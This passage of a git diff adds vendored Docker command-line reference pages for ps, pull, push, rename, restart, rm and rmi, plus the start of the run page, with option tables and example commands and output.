+$ docker ps -f since=6e63f6ff38b0
+
+CONTAINER ID        IMAGE       COMMAND       CREATED             STATUS              PORTS               NAMES
+9c3527ed70ce        busybox     "top"         10 minutes ago      Up 10 minutes                           desperate_dubinsky
+4aace5031105        busybox     "top"         10 minutes ago      Up 10 minutes                           focused_hamilton
+```
+
+#### Volume
+
+The `volume` filter shows only containers that mount a specific volume or have
+a volume mounted in a specific path:
+
+```bash{% raw %}
+$ docker ps --filter volume=remote-volume --format "table {{.ID}}\t{{.Mounts}}"
+CONTAINER ID        MOUNTS
+9c3527ed70ce        remote-volume
+
+$ docker ps --filter volume=/data --format "table {{.ID}}\t{{.Mounts}}"
+CONTAINER ID        MOUNTS
+9c3527ed70ce        remote-volume
+{% endraw %}```
+
+#### Network
+
+The `network` filter shows only containers that are connected to a network with
+a given name or id.
+
+The following filter matches all containers that are connected to a network
+with a name containing `net1`.
+
+```bash
+$ docker run -d --net=net1 --name=test1 ubuntu top
+$ docker run -d --net=net2 --name=test2 ubuntu top
+
+$ docker ps --filter network=net1
+
+CONTAINER ID        IMAGE       COMMAND       CREATED             STATUS              PORTS               NAMES
+9d4893ed80fe        ubuntu      "top"         10 minutes ago      Up 10 minutes                           test1
+```
+
+The network filter matches on both the network's name and id. The following
+example shows all containers that are attached to the `net1` network, using
+the network id as a filter;
+
+```bash
+{% raw %}
+$ docker network inspect --format "{{.ID}}" net1
+{% endraw %}
+
+8c0b4110ae930dbe26b258de9bc34a03f98056ed6f27f991d32919bfe401d7c5
+
+$ docker ps --filter network=8c0b4110ae930dbe26b258de9bc34a03f98056ed6f27f991d32919bfe401d7c5
+
+CONTAINER ID        IMAGE       COMMAND       CREATED             STATUS              PORTS               NAMES
+9d4893ed80fe        ubuntu      "top"         10 minutes ago      Up 10 minutes                           test1
+```
+
+## Formatting
+
+The formatting option (`--format`) pretty-prints container output using a Go
+template.
+
+Valid placeholders for the Go template are listed below:
+
+Placeholder   | Description
+--------------|----------------------------------------------------------------------------------------------------
+`.ID`         | Container ID
+`.Image`      | Image ID
+`.Command`    | Quoted command
+`.CreatedAt`  | Time when the container was created.
+`.RunningFor` | Elapsed time since the container was started.
+`.Ports`      | Exposed ports.
+`.Status`     | Container status.
+`.Size`       | Container disk size.
+`.Names`      | Container names.
+`.Labels`     | All labels assigned to the container.
+`.Label`      | Value of a specific label for this container. For example `'{% raw %}{{.Label "com.docker.swarm.cpu"}}{% endraw %}'`
+`.Mounts`     | Names of the volumes mounted in this container.
+`.Networks`   | Names of the networks attached to this container.
+
+When using the `--format` option, the `ps` command will either output the data
+exactly as the template declares or, when using the `table` directive, includes
+column headers as well.
+
+The following example uses a template without headers and outputs the `ID` and
+`Command` entries separated by a colon for all running containers:
+
+```bash
+{% raw %}
+$ docker ps --format "{{.ID}}: {{.Command}}"
+{% endraw %}
+
+a87ecb4f327c: /bin/sh -c #(nop) MA
+01946d9d34d8: /bin/sh -c #(nop) MA
+c1d3b0166030: /bin/sh -c yum -y up
+41d50ecd2f57: /bin/sh -c #(nop) MA
+```
+
+To list all running containers with their labels in a table format you can use:
+
+```bash
+{% raw %}
+$ docker ps --format "table {{.ID}}\t{{.Labels}}"
+{% endraw %}
+
+CONTAINER ID        LABELS
+a87ecb4f327c        com.docker.swarm.node=ubuntu,com.docker.swarm.storage=ssd
+01946d9d34d8
+c1d3b0166030        com.docker.swarm.node=debian,com.docker.swarm.cpu=6
+41d50ecd2f57        com.docker.swarm.node=fedora,com.docker.swarm.cpu=3,com.docker.swarm.storage=ssd
+```
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/pull.md b/vendor/github.com/docker/docker/docs/reference/commandline/pull.md
new file mode 100644
index 0000000000..0c960b404a
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/pull.md
@@ -0,0 +1,252 @@
+---
+title: "pull"
+description: "The pull command description and usage"
+keywords: "pull, image, hub, docker"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# pull
+
+```markdown
+Usage:  docker pull [OPTIONS] NAME[:TAG|@DIGEST]
+
+Pull an image or a repository from a registry
+
+Options:
+  -a, --all-tags                Download all tagged images in the repository
+      --disable-content-trust   Skip image verification (default true)
+      --help                    Print usage
+```
+
+Most of your images will be created on top of a base image from the
+[Docker Hub](https://hub.docker.com) registry.
+
+[Docker Hub](https://hub.docker.com) contains many pre-built images that you
+can `pull` and try without needing to define and configure your own.
+
+To download a particular image, or set of images (i.e., a repository),
+use `docker pull`.
+
+## Proxy configuration
+
+If you are behind an HTTP proxy server, for example in corporate settings,
+before open a connect to registry, you may need to configure the Docker
+daemon's proxy settings, using the `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY`
+environment variables. To set these environment variables on a host using
+`systemd`, refer to the [control and configure Docker with systemd](https://docs.docker.com/engine/admin/systemd/#http-proxy)
+for variables configuration.
+
+## Concurrent downloads
+
+By default the Docker daemon will pull three layers of an image at a time.
+If you are on a low bandwidth connection this may cause timeout issues and you may want to lower
+this via the `--max-concurrent-downloads` daemon option. See the
+[daemon documentation](dockerd.md) for more details.
+
+## Examples
+
+### Pull an image from Docker Hub
+
+To download a particular image, or set of images (i.e., a repository), use
+`docker pull`. If no tag is provided, Docker Engine uses the `:latest` tag as a
+default. This command pulls the `debian:latest` image:
+
+```bash
+$ docker pull debian
+
+Using default tag: latest
+latest: Pulling from library/debian
+fdd5d7827f33: Pull complete
+a3ed95caeb02: Pull complete
+Digest: sha256:e7d38b3517548a1c71e41bffe9c8ae6d6d29546ce46bf62159837aad072c90aa
+Status: Downloaded newer image for debian:latest
+```
+
+Docker images can consist of multiple layers. In the example above, the image
+consists of two layers; `fdd5d7827f33` and `a3ed95caeb02`.
+
+Layers can be reused by images. For example, the `debian:jessie` image shares
+both layers with `debian:latest`. Pulling the `debian:jessie` image therefore
+only pulls its metadata, but not its layers, because all layers are already
+present locally:
+
+```bash
+$ docker pull debian:jessie
+
+jessie: Pulling from library/debian
+fdd5d7827f33: Already exists
+a3ed95caeb02: Already exists
+Digest: sha256:a9c958be96d7d40df920e7041608f2f017af81800ca5ad23e327bc402626b58e
+Status: Downloaded newer image for debian:jessie
+```
+
+To see which images are present locally, use the [`docker images`](images.md)
+command:
+
+```bash
+$ docker images
+
+REPOSITORY   TAG      IMAGE ID        CREATED      SIZE
+debian       jessie   f50f9524513f    5 days ago   125.1 MB
+debian       latest   f50f9524513f    5 days ago   125.1 MB
+```
+
+Docker uses a content-addressable image store, and the image ID is a SHA256
+digest covering the image's configuration and layers. In the example above,
+`debian:jessie` and `debian:latest` have the same image ID because they are
+actually the *same* image tagged with different names. Because they are the
+same image, their layers are stored only once and do not consume extra disk
+space.
+
+For more information about images, layers, and the content-addressable store,
+refer to [understand images, containers, and storage drivers](https://docs.docker.com/engine/userguide/storagedriver/imagesandcontainers/).
+
+
+## Pull an image by digest (immutable identifier)
+
+So far, you've pulled images by their name (and "tag"). Using names and tags is
+a convenient way to work with images. When using tags, you can `docker pull` an
+image again to make sure you have the most up-to-date version of that image.
+For example, `docker pull ubuntu:14.04` pulls the latest version of the Ubuntu
+14.04 image.
+
+In some cases you don't want images to be updated to newer versions, but prefer
+to use a fixed version of an image. Docker enables you to pull an image by its
+*digest*. When pulling an image by digest, you specify *exactly* which version
+of an image to pull. Doing so, allows you to "pin" an image to that version,
+and guarantee that the image you're using is always the same.
+
+To know the digest of an image, pull the image first. Let's pull the latest
+`ubuntu:14.04` image from Docker Hub:
+
+```bash
+$ docker pull ubuntu:14.04
+
+14.04: Pulling from library/ubuntu
+5a132a7e7af1: Pull complete
+fd2731e4c50c: Pull complete
+28a2f68d1120: Pull complete
+a3ed95caeb02: Pull complete
+Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
+Status: Downloaded newer image for ubuntu:14.04
+```
+
+Docker prints the digest of the image after the pull has finished. In the example
+above, the digest of the image is:
+
+    sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
+
+Docker also prints the digest of an image when *pushing* to a registry. This
+may be useful if you want to pin to a version of the image you just pushed.
+
+A digest takes the place of the tag when pulling an image, for example, to
+pull the above image by digest, run the following command:
+
+```bash
+$ docker pull ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
+
+sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2: Pulling from library/ubuntu
+5a132a7e7af1: Already exists
+fd2731e4c50c: Already exists
+28a2f68d1120: Already exists
+a3ed95caeb02: Already exists
+Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
+Status: Downloaded newer image for ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
+```
+
+Digest can also be used in the `FROM` of a Dockerfile, for example:
+
+```Dockerfile
+FROM ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
+MAINTAINER some maintainer <maintainer@example.com>
+```
+
+> **Note**: Using this feature "pins" an image to a specific version in time.
+> Docker will therefore not pull updated versions of an image, which may include
+> security updates. If you want to pull an updated image, you need to change the
+> digest accordingly.
+
+
+## Pulling from a different registry
+
+By default, `docker pull` pulls images from [Docker Hub](https://hub.docker.com). It is also possible to
+manually specify the path of a registry to pull from. For example, if you have
+set up a local registry, you can specify its path to pull from it. A registry
+path is similar to a URL, but does not contain a protocol specifier (`https://`).
+
+The following command pulls the `testing/test-image` image from a local registry
+listening on port 5000 (`myregistry.local:5000`):
+
+```bash
+$ docker pull myregistry.local:5000/testing/test-image
+```
+
+Registry credentials are managed by [docker login](login.md).
+
+Docker uses the `https://` protocol to communicate with a registry, unless the
+registry is allowed to be accessed over an insecure connection. Refer to the
+[insecure registries](dockerd.md#insecure-registries) section for more information.
+
+
+## Pull a repository with multiple images
+
+By default, `docker pull` pulls a *single* image from the registry. A repository
+can contain multiple images. To pull all images from a repository, provide the
+`-a` (or `--all-tags`) option when using `docker pull`.
+
+This command pulls all images from the `fedora` repository:
+
+```bash
+$ docker pull --all-tags fedora
+
+Pulling repository fedora
+ad57ef8d78d7: Download complete
+105182bb5e8b: Download complete
+511136ea3c5a: Download complete
+73bd853d2ea5: Download complete
+....
+
+Status: Downloaded newer image for fedora
+```
+
+After the pull has completed use the `docker images` command to see the
+images that were pulled. The example below shows all the `fedora` images
+that are present locally:
+
+```bash
+$ docker images fedora
+
+REPOSITORY   TAG         IMAGE ID        CREATED      SIZE
+fedora       rawhide     ad57ef8d78d7    5 days ago   359.3 MB
+fedora       20          105182bb5e8b    5 days ago   372.7 MB
+fedora       heisenbug   105182bb5e8b    5 days ago   372.7 MB
+fedora       latest      105182bb5e8b    5 days ago   372.7 MB
+```
+
+## Canceling a pull
+
+Killing the `docker pull` process, for example by pressing `CTRL-c` while it is
+running in a terminal, will terminate the pull operation.
+
+```bash
+$ docker pull fedora
+
+Using default tag: latest
+latest: Pulling from library/fedora
+a3ed95caeb02: Pulling fs layer
+236608c7b546: Pulling fs layer
+^C
+```
+
+> **Note**: Technically, the Engine terminates a pull operation when the
+> connection between the Docker Engine daemon and the Docker Engine client
+> initiating the pull is lost. If the connection with the Engine daemon is
+> lost for other reasons than a manual interaction, the pull is also aborted.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/push.md b/vendor/github.com/docker/docker/docs/reference/commandline/push.md
new file mode 100644
index 0000000000..e36fd026d1
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/push.md
@@ -0,0 +1,75 @@
+---
+title: "push"
+description: "The push command description and usage"
+keywords: "share, push, image"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# push
+
+```markdown
+Usage:  docker push [OPTIONS] NAME[:TAG]
+
+Push an image or a repository to a registry
+
+Options:
+      --disable-content-trust   Skip image verification (default true)
+      --help                    Print usage
+```
+
+Use `docker push` to share your images to the [Docker Hub](https://hub.docker.com)
+registry or to a self-hosted one.
+
+Refer to the [`docker tag`](tag.md) reference for more information about valid
+image and tag names.
+
+Killing the `docker push` process, for example by pressing `CTRL-c` while it is
+running in a terminal, terminates the push operation.
+
+Registry credentials are managed by [docker login](login.md).
+
+## Concurrent uploads
+
+By default the Docker daemon will push five layers of an image at a time.
+If you are on a low bandwidth connection this may cause timeout issues and you may want to lower
+this via the `--max-concurrent-uploads` daemon option. See the
+[daemon documentation](dockerd.md) for more details.
+
+## Examples
+
+### Pushing a new image to a registry
+
+First save the new image by finding the container ID (using [`docker ps`](ps.md))
+and then committing it to a new image name.  Note that only `a-z0-9-_.` are
+allowed when naming images:
+
+```bash
+$ docker commit c16378f943fe rhel-httpd
+```
+
+Now, push the image to the registry using the image ID. In this example the
+registry is on host named `registry-host` and listening on port `5000`. To do
+this, tag the image with the host name or IP address, and the port of the
+registry:
+
+```bash
+$ docker tag rhel-httpd registry-host:5000/myadmin/rhel-httpd
+$ docker push registry-host:5000/myadmin/rhel-httpd
+```
+
+Check that this worked by running:
+
+```bash
+$ docker images
+```
+
+You should see both `rhel-httpd` and `registry-host:5000/myadmin/rhel-httpd`
+listed.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rename.md b/vendor/github.com/docker/docker/docs/reference/commandline/rename.md
new file mode 100644
index 0000000000..be035f1ce4
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/rename.md
@@ -0,0 +1,27 @@
+---
+title: "rename"
+description: "The rename command description and usage"
+keywords: "rename, docker, container"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# rename
+
+```markdown
+Usage:  docker rename CONTAINER NEW_NAME
+
+Rename a container
+
+Options:
+      --help   Print usage
+```
+
+The `docker rename` command allows the container to be renamed to a different name.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/restart.md b/vendor/github.com/docker/docker/docs/reference/commandline/restart.md
new file mode 100644
index 0000000000..9f7ed00553
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/restart.md
@@ -0,0 +1,26 @@
+---
+title: "restart"
+description: "The restart command description and usage"
+keywords: "restart, container, Docker"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# restart
+
+```markdown
+Usage:  docker restart [OPTIONS] CONTAINER [CONTAINER...]
+
+Restart one or more containers
+
+Options:
+      --help       Print usage
+  -t, --time int   Seconds to wait for stop before killing the container (default 10)
+```
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/rm.md
new file mode 100644
index 0000000000..1c3e795933
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/rm.md
@@ -0,0 +1,69 @@
+---
+title: "rm"
+description: "The rm command description and usage"
+keywords: "remove, Docker, container"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# rm
+
+```markdown
+Usage:  docker rm [OPTIONS] CONTAINER [CONTAINER...]
+
+Remove one or more containers
+
+Options:
+  -f, --force     Force the removal of a running container (uses SIGKILL)
+      --help      Print usage
+  -l, --link      Remove the specified link
+  -v, --volumes   Remove the volumes associated with the container
+```
+
+## Examples
+
+    $ docker rm /redis
+    /redis
+
+This will remove the container referenced under the link
+`/redis`.
+
+    $ docker rm --link /webapp/redis
+    /webapp/redis
+
+This will remove the underlying link between `/webapp` and the `/redis`
+containers removing all network communication.
+
+    $ docker rm --force redis
+    redis
+
+The main process inside the container referenced under the link `/redis` will receive
+`SIGKILL`, then the container will be removed.
+
+    $ docker rm $(docker ps -a -q)
+
+This command will delete all stopped containers. The command
+`docker ps -a -q` will return all existing container IDs and pass them to
+the `rm` command which will delete them. Any running containers will not be
+deleted.
+
+    $ docker rm -v redis
+    redis
+
+This command will remove the container and any volumes associated with it.
+Note that if a volume was specified with a name, it will not be removed.
+
+    $ docker create -v awesome:/foo -v /bar --name hello redis
+    hello
+    $ docker rm -v hello
+
+In this example, the volume for `/foo` will remain intact, but the volume for
+`/bar` will be removed. The same behavior holds for volumes inherited with
+`--volumes-from`.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md b/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md
new file mode 100644
index 0000000000..149b7635b6
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md
@@ -0,0 +1,83 @@
+---
+title: "rmi"
+description: "The rmi command description and usage"
+keywords: "remove, image, Docker"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# rmi
+
+```markdown
+Usage:  docker rmi [OPTIONS] IMAGE [IMAGE...]
+
+Remove one or more images
+
+Options:
+  -f, --force      Force removal of the image
+      --help       Print usage
+      --no-prune   Do not delete untagged parents
+```
+
+You can remove an image using its short or long ID, its tag, or its digest. If
+an image has one or more tag referencing it, you must remove all of them before
+the image is removed. Digest references are removed automatically when an image
+is removed by tag.
+
+    $ docker images
+    REPOSITORY                TAG                 IMAGE ID            CREATED             SIZE
+    test1                     latest              fd484f19954f        23 seconds ago      7 B (virtual 4.964 MB)
+    test                      latest              fd484f19954f        23 seconds ago      7 B (virtual 4.964 MB)
+    test2                     latest              fd484f19954f        23 seconds ago      7 B (virtual 4.964 MB)
+
+    $ docker rmi fd484f19954f
+    Error: Conflict, cannot delete image fd484f19954f because it is tagged in multiple repositories, use -f to force
+    2013/12/11 05:47:16 Error: failed to remove one or more images
+
+    $ docker rmi test1
+    Untagged: test1:latest
+    $ docker rmi test2
+    Untagged: test2:latest
+
+    $ docker images
+    REPOSITORY                TAG                 IMAGE ID            CREATED             SIZE
+    test                      latest              fd484f19954f        23 seconds ago      7 B (virtual 4.964 MB)
+    $ docker rmi test
+    Untagged: test:latest
+    Deleted: fd484f19954f4920da7ff372b5067f5b7ddb2fd3830cecd17b96ea9e286ba5b8
+
+If you use the `-f` flag and specify the image's short or long ID, then this
+command untags and removes all images that match the specified ID.
+
+    $ docker images
+    REPOSITORY                TAG                 IMAGE ID            CREATED             SIZE
+    test1                     latest              fd484f19954f        23 seconds ago      7 B (virtual 4.964 MB)
+    test                      latest              fd484f19954f        23 seconds ago      7 B (virtual 4.964 MB)
+    test2                     latest              fd484f19954f        23 seconds ago      7 B (virtual 4.964 MB)
+
+    $ docker rmi -f fd484f19954f
+    Untagged: test1:latest
+    Untagged: test:latest
+    Untagged: test2:latest
+    Deleted: fd484f19954f4920da7ff372b5067f5b7ddb2fd3830cecd17b96ea9e286ba5b8
+
+An image pulled by digest has no tag associated with it:
+
+    $ docker images --digests
+    REPOSITORY                     TAG       DIGEST                                                                    IMAGE ID        CREATED         SIZE
+    localhost:5000/test/busybox    <none>    sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf   4986bf8c1536    9 weeks ago     2.43 MB
+
+To remove an image using its digest:
+
+    $ docker rmi localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf
+    Untagged: localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf
+    Deleted: 4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125
+    Deleted: ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2
+    Deleted: df7546f9f060a2268024c8a230d8639878585defcc1bc6f79d2728a13957871b
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/run.md b/vendor/github.com/docker/docker/docs/reference/commandline/run.md
new file mode 100644
index 0000000000..e57ba4bbea
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/run.md
@@ -0,0 +1,732 @@
+---
+title: "run"
+description: "The run command description and usage"
+keywords: "run, command, container"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# run
+
+```markdown
+Usage:  docker run [OPTIONS] IMAGE [COMMAND] [ARG...]
+
+Run a command in a new container
+
+Options:
+      --add-host value              Add a custom host-to-IP mapping (host:ip) (default [])
+  -a, --attach value                Attach to STDIN, STDOUT or STDERR (default [])
+      --blkio-weight value          Block IO (relative weight), between 10 and 1000
+      --blkio-weight-device value   Block IO weight (relative device weight) (default [])
+      --cap-add value               Add Linux capabilities (default [])
+      --cap-drop value              Drop Linux capabilities (default [])
+      --cgroup-parent string        Optional parent cgroup for the container
+      --cidfile string              Write the container ID to the file
+      --cpu-count int               The number of CPUs available for execution by the container.
+                                    Windows daemon only. On Windows Server containers, this is
+                                    approximated as a percentage of total CPU usage.
+      --cpu-percent int             Limit percentage of CPU available for execution
+                                    by the container. Windows daemon only.
+                                    The processor resource controls are mutually
+                                    exclusive, the order of precedence is CPUCount
+                                    first, then CPUShares, and CPUPercent last.
+      --cpu-period int              Limit CPU CFS (Completely Fair Scheduler) period
+      --cpu-quota int               Limit CPU CFS (Completely Fair Scheduler) quota
+  -c, --cpu-shares int              CPU shares (relative weight)
+      --cpus NanoCPUs               Number of CPUs (default 0.000)
+      --cpu-rt-period int           Limit the CPU real-time period in microseconds
+      --cpu-rt-runtime int          Limit the CPU real-time runtime in microseconds
+      --cpuset-cpus string          CPUs in which to allow execution (0-3, 0,1)
+      --cpuset-mems string          MEMs in which to allow execution (0-3, 0,1)
+  -d, --detach                      Run container in background and print container ID
+      --detach-keys string          Override the key sequence for detaching a container
+      --device value                Add a host device to the container (default [])
+      --device-read-bps value       Limit read rate (bytes per second) from a device (default [])
+      --device-read-iops value      Limit read rate (IO per second) from a device (default [])
+      --device-write-bps value      Limit write rate (bytes per second) to a device (default [])
+      --device-write-iops value     Limit write rate (IO per second) to a device (default [])
+      --disable-content-trust       Skip image verification (default true)
+      --dns value                   Set custom DNS servers (default [])
+      --dns-option value            Set DNS options (default [])
+      --dns-search value            Set custom DNS search domains (default [])
+      --entrypoint string           Overwrite the default ENTRYPOINT of the image
+  -e, --env value                   Set environment variables (default [])
+      --env-file value              Read in a file of environment variables (default [])
+      --expose value                Expose a port or a range of ports (default [])
+      --group-add value             Add additional groups to join (default [])
+      --health-cmd string           Command to run to check health
+      --health-interval duration    Time between running the check (ns|us|ms|s|m|h) (default 0s)
+      --health-retries int          Consecutive failures needed to report unhealthy
+      --health-timeout duration     Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s)
+      --help                        Print usage
+  -h, --hostname string             Container host name
+      --init                        Run an init inside the container that forwards signals and reaps processes
+      --init-path string            Path to the docker-init binary
+  -i, --interactive                 Keep STDIN open even if not attached
+      --io-maxbandwidth string      Maximum IO bandwidth limit for the system drive (Windows only)
+                                    (Windows only). The format is `<number><unit>`.
+                                    Unit is optional and can be `b` (bytes per second),
+                                    `k` (kilobytes per second), `m` (megabytes per second),
+                                    or `g` (gigabytes per second). If you omit the unit,
+                                    the system uses bytes per second.
+                                    --io-maxbandwidth and --io-maxiops are mutually exclusive options.
+      --io-maxiops uint             Maximum IOps limit for the system drive (Windows only)
+      --ip string                   Container IPv4 address (e.g. 172.30.100.104)
+      --ip6 string                  Container IPv6 address (e.g. 2001:db8::33)
+      --ipc string                  IPC namespace to use
+      --isolation string            Container isolation technology
+      --kernel-memory string        Kernel memory limit
+  -l, --label value                 Set meta data on a container (default [])
+      --label-file value            Read in a line delimited file of labels (default [])
+      --link value                  Add link to another container (default [])
+      --link-local-ip value         Container IPv4/IPv6 link-local addresses (default [])
+      --log-driver string           Logging driver for the container
+      --log-opt value               Log driver options (default [])
+      --mac-address string          Container MAC address (e.g. 92:d0:c6:0a:29:33)
+  -m, --memory string               Memory limit
+      --memory-reservation string   Memory soft limit
+      --memory-swap string          Swap limit equal to memory plus swap: '-1' to enable unlimited swap
+      --memory-swappiness int       Tune container memory swappiness (0 to 100) (default -1)
+      --name string                 Assign a name to the container
+      --network-alias value         Add network-scoped alias for the container (default [])
+      --network string              Connect a container to a network
+                                    'bridge': create a network stack on the default Docker bridge
+                                    'none': no networking
+                                    'container:<name|id>': reuse another container's network stack
+                                    'host': use the Docker host network stack
+                                    '<network-name>|<network-id>': connect to a user-defined network
+      --no-healthcheck              Disable any container-specified HEALTHCHECK
+      --oom-kill-disable            Disable OOM Killer
+      --oom-score-adj int           Tune host's OOM preferences (-1000 to 1000)
+      --pid string                  PID namespace to use
+      --pids-limit int              Tune container pids limit (set -1 for unlimited)
+      --privileged                  Give extended privileges to this container
+  -p, --publish value               Publish a container's port(s) to the host (default [])
+  -P, --publish-all                 Publish all exposed ports to random ports
+      --read-only                   Mount the container's root filesystem as read only
+      --restart string              Restart policy to apply when a container exits (default "no")
+                                    Possible values are : no, on-failure[:max-retry], always, unless-stopped
+      --rm                          Automatically remove the container when it exits
+      --runtime string              Runtime to use for this container
+      --security-opt value          Security Options (default [])
+      --shm-size string             Size of /dev/shm, default value is 64MB.
+                                    The format is `<number><unit>`. `number` must be greater than `0`.
+                                    Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes),
+                                    or `g` (gigabytes). If you omit the unit, the system uses bytes.
+      --sig-proxy                   Proxy received signals to the process (default true)
+      --stop-signal string          Signal to stop a container, SIGTERM by default (default "SIGTERM")
+      --stop-timeout=10             Timeout (in seconds) to stop a container
+      --storage-opt value           Storage driver options for the container (default [])
+      --sysctl value                Sysctl options (default map[])
+      --tmpfs value                 Mount a tmpfs directory (default [])
+  -t, --tty                         Allocate a pseudo-TTY
+      --ulimit value                Ulimit options (default [])
+  -u, --user string                 Username or UID (format: <name|uid>[:<group|gid>])
+      --userns string               User namespace to use
+                                    'host': Use the Docker host user namespace
+                                    '': Use the Docker daemon user namespace specified by `--userns-remap` option.
+      --uts string                  UTS namespace to use
+  -v, --volume value                Bind mount a volume (default []). The format
+                                    is `[host-src:]container-dest[:<options>]`.
+                                    The comma-delimited `options` are [rw|ro],
+                                    [z|Z], [[r]shared|[r]slave|[r]private], and
+                                    [nocopy]. The 'host-src' is an absolute path
+                                    or a name value.
+      --volume-driver string        Optional volume driver for the container
+      --volumes-from value          Mount volumes from the specified container(s) (default [])
+  -w, --workdir string              Working directory inside the container
+```
+
+The `docker run` command first `creates` a writeable container layer over the
+specified image, and then `starts` it using the specified command. That is,
+`docker run` is equivalent to the API `/containers/create` then
+`/containers/(id)/start`. A stopped container can be restarted with all its
+previous changes intact using `docker start`. See `docker ps -a` to view a list
+of all containers.
+
+The `docker run` command can be used in combination with `docker commit` to
+[*change the command that a container runs*](commit.md). There is additional detailed information about `docker run` in the [Docker run reference](../run.md).
+
+For information on connecting a container to a network, see the ["*Docker network overview*"](https://docs.docker.com/engine/userguide/networking/).
+
+## Examples
+
+### Assign name and allocate pseudo-TTY (--name, -it)
+
+    $ docker run --name test -it debian
+    root@d6c0fe130dba:/# exit 13
+    $ echo $?
+    13
+    $ docker ps -a | grep test
+    d6c0fe130dba        debian:7            "/bin/bash"         26 seconds ago      Exited (13) 17 seconds ago                         test
+
+This example runs a container named `test` using the `debian:latest`
+image. The `-it` instructs Docker to allocate a pseudo-TTY connected to
+the container's stdin; creating an interactive `bash` shell in the container.
+In the example, the `bash` shell is quit by entering
+`exit 13`. This exit code is passed on to the caller of
+`docker run`, and is recorded in the `test` container's metadata.
+
+### Capture container ID (--cidfile)
+
+    $ docker run --cidfile /tmp/docker_test.cid ubuntu echo "test"
+
+This will create a container and print `test` to the console. The `cidfile`
+flag makes Docker attempt to create a new file and write the container ID to it.
+If the file exists already, Docker will return an error. Docker will close this
+file when `docker run` exits.
+
+### Full container capabilities (--privileged)
+
+    $ docker run -t -i --rm ubuntu bash
+    root@bc338942ef20:/# mount -t tmpfs none /mnt
+    mount: permission denied
+
+This will *not* work, because by default, most potentially dangerous kernel
+capabilities are dropped; including `cap_sys_admin` (which is required to mount
+filesystems). However, the `--privileged` flag will allow it to run:
+
+    $ docker run -t -i --privileged ubuntu bash
+    root@50e3f57e16e6:/# mount -t tmpfs none /mnt
+    root@50e3f57e16e6:/# df -h
+    Filesystem      Size  Used Avail Use% Mounted on
+    none            1.9G     0  1.9G   0% /mnt
+
+The `--privileged` flag gives *all* capabilities to the container, and it also
+lifts all the limitations enforced by the `device` cgroup controller. In other
+words, the container can then do almost everything that the host can do. This
+flag exists to allow special use-cases, like running Docker within Docker.
+
+### Set working directory (-w)
+
